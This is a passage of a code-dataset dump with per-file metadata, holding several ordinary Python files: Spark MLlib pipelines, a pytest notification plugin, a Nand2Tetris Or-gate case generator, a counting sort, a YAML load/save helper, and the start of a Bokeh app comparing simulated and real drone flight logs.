hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c5bb01946303877ea63e29bebf7b652741dee0f9 | 5,170 | py | Python | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | 1 | 2022-01-11T08:24:26.000Z | 2022-01-11T08:24:26.000Z | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | null | null | null | MllibPipelines.py | RumbleDB/rumbleml-experiments | 284abb7bf0646965a3fcbffe1e15d792b214f860 | [
"Apache-2.0"
] | null | null | null | # pyspark core
from pyspark.ml import Pipeline
# Preprocessing
from pyspark.ml.feature import StandardScaler, MaxAbsScaler, PCA, VectorAssembler, Imputer, OneHotEncoder
# Models
from pyspark.ml.regression import LinearRegression
from pyspark.ml.classification import LogisticRegression, RandomForestClassifier, LinearSVC, NaiveBayes, MultilayerPerceptronClassifier
def get_clf(mode, **kwargs):
'''
Return an MLlib classifier (or regressor, for mode 'linear') for the pipelines
'''
if mode == 'logistic':
max_iter = kwargs.get('max_iter', 5)
model = LogisticRegression(featuresCol="transformed_features", maxIter=max_iter)
elif mode=='RandomForest':
n_estimators = kwargs.get('n_estimators', 5)
model = RandomForestClassifier(featuresCol="transformed_features", numTrees=n_estimators)
elif mode=='LinearSVC':
max_iter = kwargs.get('max_iter', 5)
model = LinearSVC(featuresCol="transformed_features", maxIter=max_iter)
elif mode=='NB':
model = NaiveBayes(featuresCol="transformed_features")
elif mode=='linear':
model = LinearRegression(featuresCol="transformed_features")
elif 'NN' in mode:
solver = kwargs.get('solver', 'gd') # Spark's MLP supports 'l-bfgs' or 'gd', not sklearn's 'sgd'
hidden_layer_sizes = kwargs.get('hidden_layer_sizes', (20,))
if isinstance(hidden_layer_sizes, tuple): # Spark expects a list of layer sizes
hidden_layer_sizes = list(hidden_layer_sizes)
activation = kwargs.get('activation', 'relu')
learning_rate_init = kwargs.get('learning_rate', 0.001)
max_iter = kwargs.get('max_iter', 5000)
if mode=='NN':
model = MultilayerPerceptronClassifier(solver=solver, layers=hidden_layer_sizes, stepSize=learning_rate_init,
maxIter=max_iter)
else:
raise ValueError("Invalid mode!") # fail fast on unknown modes, mirroring get_pipe_ops
return model
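# Usage sketch for get_clf above (illustrative, not part of the original experiments):
# the sklearn-style kwargs are mapped onto the Spark estimator parameters, e.g.
#   clf = get_clf('RandomForest', n_estimators=50)  # -> RandomForestClassifier(numTrees=50)
#   clf = get_clf('logistic', max_iter=100)         # -> LogisticRegression(maxIter=100)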
def get_pipe_ops(mode, inputCol="features", outputCol="transformed_features"):
if mode == 'pipe_0':
# just the classifier
vecAssembler = VectorAssembler(outputCol=outputCol)
vecAssembler.setInputCols([inputCol])
ops = [vecAssembler]
elif mode == 'pipe_1':
# 1-step scaler (*map)
scaler = MaxAbsScaler(inputCol=inputCol, outputCol=outputCol)
ops = [scaler]
# elif mode == 'pipe_2':
# 2-step function scaler (*map)
# def logVar(x):
# return MaxAbsScaler(np.log(x))
# ops = [('logscaler', FunctionTransformer(logVar))]
elif mode == 'pipe_3':
# dimensionality reduction (*map)
pca = PCA(k=2, inputCol=inputCol, outputCol=outputCol)
ops = [pca]
# elif mode == 'pipe_4':
# k-means (fork)
# union = FeatureUnion([("indicator", MissingIndicator()),
# ("kmeans", KMeans(random_state=0))])
# ops = [('union', union)]
elif mode == 'pipe_5':
# TODO
# multiple dimensionality reductions (fork)
pca = PCA(k=2, inputCol=inputCol, outputCol="pca_output")
#svd = SVD()
#lda = LDA()
vecAssembler = VectorAssembler(outputCol=outputCol)
vecAssembler.setInputCols(["pca_output"])
ops = [pca, vecAssembler]
# elif mode == 'pipe_6':
# # image blurring operator
# grayify = RGB2GrayTransformer()
# def gaussian_blur(x):
# return skimage.filters.gaussian(x)
# ops = [('grayify', grayify), ('blur', FunctionTransformer(gaussian_blur))]
# elif mode == 'pipe_7':
# # complex image processing operators
# grayify = RGB2GrayTransformer()
# hogify = HogTransformer(
# pixels_per_cell=(4, 4),
# cells_per_block=(2,2),
# orientations=9,
# block_norm='L2-Hys'
# )
# ops = [('grayify', grayify), ('hogify', hogify)]
else:
raise ValueError("Invalid mode!")
return ops
def create_numerical_pipeline(ops_mode, imputer=True, clf_mode='logistic', **kwargs):
ops = get_pipe_ops(ops_mode)
clf = get_clf(clf_mode, **kwargs)
# vecAssembler = VectorAssembler(outputCol="data")
# vecAssembler.setInputCols(["col_0", "col_1", "col_2", "col_3", "col_4", "col_5", "col_6", "col_7", "col_8", "col_9", "col_10", "col_11", "col_12", "col_13"])
# ops = [vecAssembler] + ops
if imputer:
imp = Imputer(strategy='mean')
ops = [imp] + ops
ops = ops + [clf]
pipe = Pipeline(stages=ops)
return pipe
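# Minimal end-to-end sketch, assuming a hypothetical DataFrame `df` with a vector
# column named "features" and a "label" column (the column names are this module's
# defaults; the DataFrame itself is not part of this file):
#   pipe = create_numerical_pipeline('pipe_1', imputer=False, clf_mode='logistic')
#   model = pipe.fit(df)
#   predictions = model.transform(df)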
def create_tabular_pipeline(num_mode, outputCols="output", categorical_ix=["cat_features"], numerical_ix=["num_features"], imputer=True, clf_mode='logistic', **kwargs):
num_ops = get_pipe_ops(num_mode, outputCol=outputCols) # get_pipe_ops takes outputCol, not outputCols
# imp = Imputer(strategy='categorical') - mllib doesn't support categorical input
cat_one_hot = OneHotEncoder(inputCols=categorical_ix, outputCols=["cat_features"]) # outputCols expects a list
ops = [cat_one_hot] + num_ops
if imputer:
num_imputer = Imputer(inputCols=numerical_ix, strategy='median', outputCols=['data'])
ops = [num_imputer] + ops
clf = get_clf(clf_mode, **kwargs) # forward the kwargs, as create_numerical_pipeline does
vecAssembler = VectorAssembler(outputCol=outputCols)
vecAssembler.setInputCols(["cat_output"]) # note: this assembler is never added to the pipeline stages
ops = ops + [clf]
pipe = Pipeline(stages=ops)
return pipe | 38.014706 | 168 | 0.640426 | 560 | 5,170 | 5.726786 | 0.305357 | 0.02744 | 0.026193 | 0.014967 | 0.208918 | 0.183661 | 0.113502 | 0.07546 | 0.024945 | 0 | 0 | 0.013118 | 0.233269 | 5,170 | 136 | 169 | 38.014706 | 0.795913 | 0.271373 | 0 | 0.169014 | 0 | 0 | 0.107249 | 0 | 0 | 0 | 0 | 0.007353 | 0 | 1 | 0.056338 | false | 0 | 0.056338 | 0 | 0.169014 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5bc2406eeec880f5701a8eed1c391df551334b5 | 2,927 | py | Python | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | 2 | 2020-08-27T03:14:05.000Z | 2020-10-24T17:17:36.000Z | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | 5 | 2019-12-02T08:49:15.000Z | 2020-06-22T08:38:34.000Z | src/pytest_notification/plugin.py | rhpvorderman/pytest-notification | 3f322ab04914f52525e1b07bc80537d5f9a00250 | [
"MIT"
] | null | null | null | # Copyright (c) 2019 Leiden University Medical Center
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from _pytest.config.argparsing import Parser as PytestParser
import pytest
from .notifications import DEFAULT_FAIL_ICON, DEFAULT_SUCCESS_ICON, notify
from .sound import DEFAULT_FAIL_SOUND, DEFAULT_SUCCESS_SOUND, play_sound
def pytest_addoption(parser: PytestParser):
"""
Add options to the pytest parser. Works like the built-in argparse module.
This function is used by pytest. It is not meant to be called from outside.
"""
parser.addoption("--notify", action="store_true",
help="Sends a desktop notification when pytest is "
"finished. (Only implemented on Linux. Requires the "
"'notify-send' program in PATH on Linux.")
parser.addoption("--sound", "--play-sound", action="store_true",
help="Plays a sound when pytest is finished. (Only "
"implemented on Linux and Macintosh systems).")
parser.addoption("--disturb", action="store_true",
help="Alias for --notify --sound")
def pytest_sessionfinish(session: pytest.Session, exitstatus: int):
"""
Hook function used by pytest. This code will be run at the end of a
pytest session.
"""
notify_on = session.config.getoption("notify")
sound_on = session.config.getoption("sound")
disturb = session.config.getoption("disturb")
if notify_on or disturb:
if exitstatus == 0:
notify("Pytest", "All tests are succesfull!",
icon=DEFAULT_SUCCESS_ICON)
else:
notify("Pytest", "Failing tests detected!",
icon=DEFAULT_FAIL_ICON)
if sound_on or disturb:
if exitstatus == 0:
play_sound(DEFAULT_SUCCESS_SOUND)
else:
play_sound(DEFAULT_FAIL_SOUND)
| 42.42029 | 79 | 0.69081 | 385 | 2,927 | 5.176623 | 0.433766 | 0.044155 | 0.022579 | 0.0286 | 0.066232 | 0.066232 | 0.042148 | 0.042148 | 0 | 0 | 0 | 0.002677 | 0.23437 | 2,927 | 68 | 80 | 43.044118 | 0.886658 | 0.446874 | 0 | 0.133333 | 0 | 0 | 0.251601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5bc9b2009bdf6d2e3701fee56d0333e0b92d2e8 | 379 | py | Python | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | 5 | 2020-02-26T16:53:04.000Z | 2020-02-27T06:12:46.000Z | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | null | null | null | Chips/Or.py | AdilRas/Nand2TetrisCaseGenerator | db82e6988d03d64884e4ac0cf02cecb78e275bc5 | [
"MIT"
] | 2 | 2020-02-26T16:53:15.000Z | 2020-02-28T03:45:56.000Z | from src.TestCaseGenerator import *
input_variables = [Var("a", 1, "B"), Var("b", 1, "B")]
output_variables = [Var("out", 1, "B")]
def or_logic(args):
out = []
if args[0] == 1 or args[1] == 1:
out.append(1)
else:
out.append(0)
return out
generate(name="Or", numCases=10, inVars=input_variables, outVars=output_variables, function=or_logic)
| 19.947368 | 101 | 0.612137 | 56 | 379 | 4.035714 | 0.5 | 0.026549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036667 | 0.208443 | 379 | 18 | 102 | 21.055556 | 0.716667 | 0 | 0 | 0 | 0 | 0 | 0.026525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5be570abca3ed89a78ad5032997c2885276882c | 1,129 | py | Python | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | alg_counting_sort.py | lukes1582/algoritmi | 3313c9ae3cb5f9f0c410ca86ea29e23cb1c3c8fd | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""
l0m1s
lukes1582@gmail.com
counting sort algorithm developed for Python
"""
arr = [50, 1000, 0, 43, 8, 5, 1, 10]
print(arr)
maxElement = int(max(arr))
minElement = int(min(arr))
rangeOfElements = maxElement - minElement + 1
"""
first, assign 0 to every element of the count_arr array, whose length is
exactly the range computed above
"""
count_arr = [0 for _ in range(rangeOfElements)]
"""
then assign 0 to every element of the output_arr array, which has the same
size as the array to be sorted
"""
output_arr = [0 for _ in range(len(arr))]
for h in range(0, len(arr)):
count_arr[arr[h]-minElement] += 1 # increment count_arr at the position given by the value taken from arr minus the minimum value
for k in range(1, len(count_arr)):
count_arr[k] += count_arr[k-1]
for j in range(len(arr)-1, -1, -1):
output_arr[count_arr[arr[j] - minElement] - 1] = arr[j]
count_arr[arr[j] - minElement] -= 1
print(output_arr)
for w in range(0, len(arr)):
arr[w] = output_arr[w]
print(arr)
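# Worked example for the array above: counting sort runs in O(n + k) time, where
# k = rangeOfElements (here 1000 - 0 + 1 = 1001), and the final sorted output is
# [0, 1, 5, 8, 10, 43, 50, 1000]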
| 24.543478 | 136 | 0.669619 | 183 | 1,129 | 4.043716 | 0.415301 | 0.097297 | 0.044595 | 0.027027 | 0.210811 | 0.135135 | 0.072973 | 0 | 0 | 0 | 0 | 0.041433 | 0.209035 | 1,129 | 45 | 137 | 25.088889 | 0.787234 | 0.165633 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c0dc125aaf6279807b7ce72e48ebe44653590d | 3,434 | py | Python | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | stitch/datastore/yaml.py | hackerhelmut/stitch | 5ea78a219a8bc4a130a8b8d44ebf8f864dae95dd | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/env python2.7
# vim : set fileencoding=utf-8 expandtab noai ts=4 sw=4 filetype=python :
"""
embeddedfactor GmbH 2015
Implements YAML loading and storing
"""
from __future__ import print_function
import sys
import stitch.datastore
import types
import itertools
from ruamel import yaml
from ruamel import ordereddict
from ruamel.yaml.comments import CommentedMap
from ruamel.yaml import scalarstring
FILE_PROPERTY = "file"
FILE_EXTENSION = ".yaml"
class Query(object):
"""Query object"""
def __init__(self, query):
"""
Store query string
"""
self.query = query
def __repr__(self):
"""
Print string representation of the query
"""
return "!query:"+self.query
def get_query(self):
"""
Return the query string
"""
return self.query
def query_constructor(loader, node):
"""
Construct a Query object from the scalar node read by the loader
"""
value = loader.construct_scalar(node)
return Query(value)
yaml.add_constructor(u'!query', query_constructor, yaml.RoundTripLoader)
def query_representer(dumper, data):
"""
Convert Query object to a query string with tag
"""
return dumper.represent_scalar(u'!query', data.query)
yaml.add_representer(Query, query_representer, yaml.RoundTripDumper)
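# Round-trip sketch (the YAML document here is hypothetical): loading the text
#   selector: !query host=web*
# with yaml.load(..., yaml.RoundTripLoader) yields {'selector': Query('host=web*')},
# and dumping it with yaml.RoundTripDumper serializes the tag back as !query.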
class folded_str(unicode): pass
def folded_str_representer(dumper, data):
"""
Converts all folded_str instances to strings folded in YAML with the > style
"""
return dumper.represent_scalar(u'tag:yaml.org,2002:str', data, style='>')
yaml.add_representer(folded_str, folded_str_representer, yaml.RoundTripDumper)
class literal_str(unicode): pass
def literal_str_representer(dumper, data):
"""
Converts all literal_str instances to strings in YAML with the | style
"""
return dumper.represent_scalar(u'tag:yaml.org,2002:str', data, style='|')
yaml.add_representer(literal_str, literal_str_representer, yaml.RoundTripDumper)
def load(filename):
"""Load a dict from a yaml file"""
try:
result = {}
with open(filename, "r") as stream:
result = yaml.load(stream.read(), yaml.RoundTripLoader)
if isinstance(result, ordereddict.ordereddict):
result.insert(0, FILE_PROPERTY, filename)
elif isinstance(result, dict):
result[FILE_PROPERTY] = filename
except yaml.reader.ReaderError as err:
print("Error in file:", filename)
print(err) # exceptions have no message() method; printing the exception gives its description
sys.exit(1)
except yaml.scanner.ScannerError as err:
print("Error in file {filename} ".format(filename=filename), err)
sys.exit(1)
except yaml.parser.ParserError as err:
print("Error in file {filename} ".format(filename=filename), err)
sys.exit(1)
return result
def save(obj, filename=None):
"""Save a dict to a yaml file"""
if not filename and FILE_PROPERTY in obj:
filename = obj[FILE_PROPERTY]
del obj[FILE_PROPERTY]
if not filename:
raise Exception()
with open(filename, "w") as stream:
stream.write(yaml.dump(obj, Dumper=yaml.RoundTripDumper))
def dump(obj):
"""Dump a dict as yaml into a string"""
if isinstance(obj, types.GeneratorType):
obj = tuple(obj)
elif isinstance(obj, itertools.chain):
obj = list(obj)
return u"---\n"+yaml.dump(obj, Dumper=yaml.RoundTripDumper)
| 30.122807 | 80 | 0.672976 | 439 | 3,434 | 5.157175 | 0.302961 | 0.031802 | 0.027827 | 0.035777 | 0.234541 | 0.209806 | 0.147085 | 0.134276 | 0.134276 | 0.134276 | 0 | 0.007848 | 0.220734 | 3,434 | 113 | 81 | 30.389381 | 0.838191 | 0.172685 | 0 | 0.074627 | 0 | 0 | 0.053338 | 0.015666 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149254 | false | 0.029851 | 0.134328 | 0 | 0.447761 | 0.074627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c2ac94d668415c7b3c3caf90147a017c256922 | 27,466 | py | Python | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | null | null | null | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | null | null | null | thiel_app/main.py | zlite/PX4_flight_review | 66697465ac87a484af07fc310cbf9030bc15764e | [
"BSD-3-Clause"
] | 1 | 2021-03-03T18:51:57.000Z | 2021-03-03T18:51:57.000Z | """ This contains Thiel analysis plots """
from os import read, path
# import px4tools
import numpy as np
import math
import io
import os
import sys
import errno
import base64
from db_entry import *
import pickle
import simstats # this is the module that you can modify to add your own stats
#import thiel_analysis
from bokeh.io import curdoc,output_file, show
from bokeh.models.widgets import Div
from bokeh.models import Title
from bokeh.layouts import column
from scipy.interpolate import interp1d
from plotted_tables import *
from configured_plots import *
from os.path import dirname, join
from config import *
from colors import HTML_color_to_RGB
from helper import *
from leaflet import ulog_to_polyline
from bokeh.models import RadioButtonGroup, Button
from bokeh.models.widgets import Paragraph
import pandas as pd
pd.options.mode.chained_assignment = None # default='warn'
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, PreText, Select
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
from bokeh.application.handlers import DirectoryHandler
#pylint: disable=cell-var-from-loop, undefined-loop-variable,
default_simname = 'sim.ulg' # these are the defaults if you don't load your own data
default_realname = 'real.ulg'
simdescription = '(Dummy data. Please select your own sim log above)'
realdescription = '(Dummy data. Please select your own real log above)'
sim_polarity = 1 # determines if we should reverse the Y data
real_polarity = 1
simx_offset = 0
realx_offset = 0
realnorm = 0
simnorm = 0
read_file = True
get_new_data = True
reverse_sim_data = False
reverse_real_data = False
refresh = False
read_file_local = False
new_real = False
new_sim = False
mission_only = False
sim_metric = 'x'
real_metric = 'x'
tplot_height = 400
tplot_width = 1000
keys = []
labels_text = []
labels_color = []
labels_y_pos = []
labels_x_pos = []
annotations = []
mission_annotations = []
labels = []
sim_label = Label()
real_label = Label()
annotation_counter = 0
mission_annotation_counter = 0
config = [default_simname, default_realname, sim_metric, real_metric, simdescription, realdescription, 1, 1] # this is just a placeholder in case you don't already have a saved settings file
# def kill():
# # this is just for debugging. It creates an error so we can watch crash handling
# sys.exit()
# # raise RuntimeError("Fake error")
# kill_mode_button = Button(label="Kill") # This is just a debugging tool to make sure the web app can handle crashes
# kill_mode_button.on_click(kill)
mission_mode_button = RadioButtonGroup(
labels=["Show all flight modes", "Show only Mission mode"], active=0)
mission_mode_button.on_change('active', lambda attr, old, new: mission_mode())
normalize_mode_button = RadioButtonGroup(
labels=["Raw data", "Normalized data"], active=0)
normalize_mode_button.on_change('active', lambda attr, old, new: normalize())
sim_reverse_button = RadioButtonGroup(
labels=["Sim Default Orientation", "Reversed Orientation"], active=0)
sim_reverse_button.on_change('active', lambda attr, old, new: reverse_sim())
real_reverse_button = RadioButtonGroup(
labels=["Real Default Orientation", "Reversed Orientation"], active=0)
real_reverse_button.on_change('active', lambda attr, old, new: reverse_real())
sim_swap_button = RadioButtonGroup(
labels=["Sim Default X/Y", "Swapped X/Y"], active=0)
sim_swap_button.on_change('active', lambda attr, old, new: swap_sim())
real_swap_button = RadioButtonGroup(
labels=["Real Default X/Y", "Swapped X/Y"], active=0)
real_swap_button.on_change('active', lambda attr, old, new: swap_real())
spacer = Div(text="<hr>", width=800, height=20)
explainer = Div(text="<b>Note:</b> the X/Y coordinate system is set relatively arbitrarily by the drone at startup \
and does not reflect GPS positions or compass direction. So you may find that you need to \
compare one file's X with another's Y or reverse one to achieve alignment. ", width=800, height=50)
# set up widgets
stats = PreText(text='Thiel Coefficient', width=500)
# datatype = Select(value='XY', options=DEFAULT_FIELDS)
stats2 = PreText(text='Song Coefficient', width=500)
# @lru_cache()
def load_data(filename):
global keys
fname = os.path.join(get_log_filepath(), filename)
if path.exists(fname):
ulog = load_ulog_file(fname)
else:
print("log does not exist; loading default data instead")
fname = os.path.join(get_log_filepath(), 'sim.ulg')
ulog = load_ulog_file(fname)
data = ulog.data_list
for d in data:
data_keys = [f.field_name for f in d.field_data]
data_keys.remove('timestamp')
keys.append(data_keys)
cur_dataset = ulog.get_dataset('vehicle_local_position')
flight_mode_changes = get_flight_mode_changes(ulog)
return cur_dataset, flight_mode_changes
# @lru_cache()
def get_data(simname,realname, sim_metric, real_metric, read_file):
global dfsim, dfreal, sim_flight_mode_changes, real_flight_mode_changes
if read_file:
dfsim, sim_flight_mode_changes = load_data(simname)
dfreal, real_flight_mode_changes = load_data(realname)
read_file = False
sim_data = dfsim.data[sim_metric].copy() # we copy the data so we can change it wihout changing the original
sim_time = dfsim.data['timestamp'].copy()
real_data = dfreal.data[real_metric].copy()
real_time = dfreal.data['timestamp'].copy()
if mission_only: # only show data for when the drone is in auto modes
temp_pd_sim = pd.DataFrame(sim_data, columns = ['sim']) # create one dataframe that's just the flight data for the selected metric
sim_mission_start, sim_mission_end = get_mission_mode(sim_flight_mode_changes)
pd_sim_time = pd.DataFrame(sim_time,columns = ['time'])
temp_pd_sim = pd.concat([pd_sim_time,temp_pd_sim], axis=1)
pd_sim2 = temp_pd_sim.loc[(temp_pd_sim['time'] >= sim_mission_start) & (temp_pd_sim['time'] <= sim_mission_end)] #slice this just to the mission portion
pd_sim = pd_sim2.copy()
starting_sim_time = pd_sim.iat[0,0]
pd_sim['time'] -= starting_sim_time # zero base the time
pd_sim_time['time'] = pd_sim['time']
pd_sim = pd_sim.drop(columns=['time']) # we don't need these old time columns anymore
temp_pd_real = pd.DataFrame(real_data, columns = ['real'])
real_mission_start, real_mission_end = get_mission_mode(real_flight_mode_changes)
pd_real_time = pd.DataFrame(real_time, columns = ['time'])
temp_pd_real = pd.concat([pd_real_time,temp_pd_real], axis=1)
# print("Real mission start, finish", real_mission_start,real_mission_end)
